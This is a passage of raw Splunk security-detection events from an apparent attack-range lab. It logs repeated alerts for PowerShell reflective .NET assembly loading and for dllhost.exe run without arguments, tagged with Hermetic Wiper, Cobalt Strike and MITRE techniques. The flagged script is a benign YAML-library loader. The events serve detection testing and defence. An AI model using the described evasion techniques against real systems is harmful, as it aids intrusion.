\"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664762132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664755200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664755200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3636", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664755200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664755200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xe34", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664758532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T23:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T23:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664758532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T23:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T23:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664758532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T23:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T23:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664758532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T23:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T23:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664751600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664751600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3676", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. 